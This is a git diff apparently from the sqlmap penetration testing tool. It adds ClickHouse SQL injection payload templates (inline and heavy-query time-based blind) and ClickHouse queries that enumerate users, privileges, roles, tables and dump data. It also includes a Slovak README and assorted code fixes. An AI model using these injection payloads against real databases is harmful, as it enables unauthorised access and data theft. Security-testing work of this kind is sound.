<test>
|
||||
<title>ClickHouse inline queries</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- End of inline queries tests -->
|
||||
</root>
|
||||
|
||||
@@ -195,9 +195,9 @@
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,8,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -235,9 +235,9 @@
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -276,9 +276,9 @@
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
@@ -318,9 +318,9 @@
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
@@ -1494,6 +1494,44 @@
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse AND time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse OR time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- End of time-based boolean tests -->
|
||||
|
||||
<!-- Time-based boolean tests - Numerous clauses -->
|
||||
@@ -1607,10 +1645,10 @@
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<where>3</where>
|
||||
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -1880,7 +1918,7 @@
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
|
||||
@@ -1900,7 +1938,7 @@
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
|
||||
|
||||
@@ -938,8 +938,8 @@
|
||||
<length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
|
||||
<isnull query="COALESCE(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="{LIMIT %d OFFSET %d}"/>
|
||||
<limitregexp query="{LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)}"/>
|
||||
<limit query="OFFSET %d ROWS FETCH FIRST %d ROWS ONLY"/>
|
||||
<limitregexp query="OFFSET\s+([\d]+)\s+ROWS\s+FETCH\s+FIRST\s+([\d]+)\s+ROWS\s+ONLY"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring/>
|
||||
@@ -962,11 +962,11 @@
|
||||
<is_dba query="(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0"/>
|
||||
<dbs>
|
||||
<inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS"/>
|
||||
<blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
|
||||
<blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID" condition="SCHEMANAME"/>
|
||||
<blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' {LIMIT 1 OFFSET %d}" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
|
||||
<blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->
|
||||
@@ -975,11 +975,11 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM %s {LIMIT 1 OFFSET %d}" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT %s FROM %s OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.SYSUSERS"/>
|
||||
<blind query="SELECT USERNAME FROM SYS.SYSUSERS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
|
||||
<blind query="SELECT USERNAME FROM SYS.SYSUSERS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
|
||||
</users>
|
||||
<!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->
|
||||
<passwords/>
|
||||
@@ -1319,6 +1319,75 @@
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<dbms value="ClickHouse">
|
||||
<cast query="CAST(%s AS String)"/>
|
||||
<length query="length(%s)"/>
|
||||
<isnull query="ifNull(%s, '')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--" query2="//"/>
|
||||
<substring query="substring(%s,%d,%d)"/>
|
||||
<concatenate query="%s||%s"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<inference query="substring((%s),%d,1)>'%c'" />
|
||||
<banner query="select version()"/>
|
||||
<current_user query="currentUser()"/>
|
||||
<current_db query="currentDatabase()"/>
|
||||
<hostname query="hostName()"/>
|
||||
<table_comment/>
|
||||
<column_comment/>
|
||||
<is_dba query="(SELECT access_type FROM system.grants WHERE user_name=currentUser())='ALL'"/>
|
||||
<check_udf/>
|
||||
<users>
|
||||
<inband query="SELECT name FROM system.users"/>
|
||||
<blind query="SELECT name FROM system.users LIMIT %d,1" count="SELECT COUNT(name) FROM system.users"/>
|
||||
</users>
|
||||
<passwords/>
|
||||
<privileges>
|
||||
<inband query="SELECT DISTINCT user_name,access_type FROM system.grants" condition="user_name"/>
|
||||
<blind query="SELECT DISTINCT(access_type) FROM system.grants WHERE user_name='%s' ORDER BY access_type LIMIT %d,1" count="SELECT COUNT(DISTINCT(access_type)) FROM system.grants WHERE user_name='%s'"/>
|
||||
</privileges>
|
||||
<roles>
|
||||
<inband query="SELECT DISTINCT user_name,role_name FROM system.role_grants" condition="user_name"/>
|
||||
<blind query="SELECT DISTINCT(role_name) FROM system.role_grants WHERE user_name='%s' ORDER BY role_name LIMIT %d,1" count="SELECT COUNT(DISTINCT(role_name)) FROM system.role_grants WHERE user_name='%s'"/>
|
||||
</roles>
|
||||
<statements/>
|
||||
<dbs>
|
||||
<inband query="SELECT schema_name FROM information_schema.schemata"/>
|
||||
<blind query="SELECT schema_name FROM information_schema.schemata ORDER BY schema_name LIMIT 1 OFFSET %d" count="SELECT COUNT(schema_name) FROM information_schema.schemata"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT table_schema,table_name FROM information_schema.tables" condition="table_schema"/>
|
||||
<blind query="SELECT table_name FROM information_schema.tables WHERE table_schema='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
|
||||
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d,1" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
|
||||
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1 " count="SELECT COUNT(*) FROM %s.%s"/>
|
||||
</dump_table>
|
||||
<search_table>
|
||||
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
|
||||
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
|
||||
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
|
||||
</search_column>
|
||||
<search_db>
|
||||
<inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
|
||||
<blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
|
||||
</search_db>
|
||||
</dbms>
|
||||
|
||||
<dbms value="CrateDB">
|
||||
<cast query="CAST(%s AS TEXT)"/>
|
||||
<length query="CHAR_LENGTH((%s)::text)"/>
|
||||
|
||||
@@ -1,3 +1,8 @@
|
||||
# Version 1.7 (2022-01-02)
|
||||
|
||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
|
||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
|
||||
|
||||
# Version 1.6 (2022-01-03)
|
||||
|
||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
|
||||
|
||||
50
doc/translations/README-sk-SK.md
Normal file
50
doc/translations/README-sk-SK.md
Normal file
@@ -0,0 +1,50 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.
|
||||
|
||||
Snímky obrazovky
|
||||
----
|
||||
|
||||

|
||||
|
||||
Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.
|
||||
|
||||
Inštalácia
|
||||
----
|
||||
|
||||
Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.
|
||||
|
||||
Využitie
|
||||
----
|
||||
|
||||
Na získanie zoznamu základných možností a prepínačov, použite:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Na získanie zoznamu všetkých možností a prepínačov, použite:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
|
||||
Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Linky
|
||||
----
|
||||
|
||||
* Domovská stránka: https://sqlmap.org
|
||||
* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
||||
sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
||||
|
||||
Kullanım
|
||||
----
|
||||
|
||||
@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
|
||||
xrange = range
|
||||
ord = lambda _: _
|
||||
|
||||
KEY = b"ENWsCymUeJcXqSbD"
|
||||
KEY = b"E6wRbVhD0IBeCiGJ"
|
||||
|
||||
def xor(message, key):
|
||||
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -512,6 +512,23 @@ def start():
|
||||
testSqlInj = True
|
||||
paramKey = (conf.hostname, conf.path, place, parameter)
|
||||
|
||||
if kb.processUserMarks:
|
||||
if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
|
||||
if kb.processNonCustom is None:
|
||||
message = "other non-custom parameters found. "
|
||||
message += "Do you want to process them too? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
else:
|
||||
kb.processNonCustom = choice == 'Y'
|
||||
|
||||
if not kb.processNonCustom:
|
||||
infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
|
||||
logger.info(infoMsg)
|
||||
continue
|
||||
|
||||
if paramKey in kb.testedParams:
|
||||
testSqlInj = False
|
||||
|
||||
|
||||
@@ -14,6 +14,7 @@ from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.settings import ACCESS_ALIASES
|
||||
from lib.core.settings import ALTIBASE_ALIASES
|
||||
from lib.core.settings import CACHE_ALIASES
|
||||
from lib.core.settings import CLICKHOUSE_ALIASES
|
||||
from lib.core.settings import CRATEDB_ALIASES
|
||||
from lib.core.settings import CUBRID_ALIASES
|
||||
from lib.core.settings import DB2_ALIASES
|
||||
@@ -46,6 +47,8 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn
|
||||
from plugins.dbms.altibase import AltibaseMap
|
||||
from plugins.dbms.cache.connector import Connector as CacheConn
|
||||
from plugins.dbms.cache import CacheMap
|
||||
from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
|
||||
from plugins.dbms.clickhouse import ClickHouseMap
|
||||
from plugins.dbms.cratedb.connector import Connector as CrateDBConn
|
||||
from plugins.dbms.cratedb import CrateDBMap
|
||||
from plugins.dbms.cubrid.connector import Connector as CubridConn
|
||||
@@ -122,6 +125,7 @@ def setHandler():
|
||||
(DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
|
||||
(DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
|
||||
(DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
|
||||
(DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
|
||||
(DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
|
||||
(DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
|
||||
(DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
|
||||
|
||||
@@ -222,7 +222,8 @@ class Agent(object):
|
||||
def _(pattern, repl, string):
|
||||
retVal = string
|
||||
match = None
|
||||
for match in re.finditer(pattern, string):
|
||||
|
||||
for match in re.finditer(pattern, string or ""):
|
||||
pass
|
||||
|
||||
if match:
|
||||
@@ -1027,8 +1028,8 @@ class Agent(object):
|
||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
|
||||
limitedQuery += " %s" % limitStr
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB):
|
||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB, DBMS.CLICKHOUSE):
|
||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
|
||||
limitedQuery += " %s" % limitStr
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO):
|
||||
|
||||
@@ -1769,7 +1769,7 @@ def parseTargetUrl():
|
||||
errMsg = "invalid target URL port (%d)" % conf.port
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
|
||||
conf.url = getUnicode("%s://%s%s%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, (":%d" % conf.port) if not (conf.port == 80 and conf.scheme == "http" or conf.port == 443 and conf.scheme == "https") else "", conf.path))
|
||||
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
|
||||
|
||||
if urlSplit.query:
|
||||
@@ -4940,6 +4940,12 @@ def decodeDbmsHexValue(value, raw=False):
|
||||
|
||||
>>> decodeDbmsHexValue('3132332031') == u'123 1'
|
||||
True
|
||||
>>> decodeDbmsHexValue('31003200330020003100') == u'123 1'
|
||||
True
|
||||
>>> decodeDbmsHexValue('00310032003300200031') == u'123 1'
|
||||
True
|
||||
>>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1'
|
||||
True
|
||||
>>> decodeDbmsHexValue('313233203') == u'123 ?'
|
||||
True
|
||||
>>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2']
|
||||
@@ -4978,6 +4984,9 @@ def decodeDbmsHexValue(value, raw=False):
|
||||
if not isinstance(retVal, six.text_type):
|
||||
retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING)
|
||||
|
||||
if u"\x00" in retVal:
|
||||
retVal = retVal.replace(u"\x00", u"")
|
||||
|
||||
return retVal
|
||||
|
||||
try:
|
||||
@@ -5327,6 +5336,7 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
continue
|
||||
|
||||
getPostReq = False
|
||||
forceBody = False
|
||||
url = None
|
||||
host = None
|
||||
method = None
|
||||
@@ -5347,7 +5357,7 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
line = line.strip('\r')
|
||||
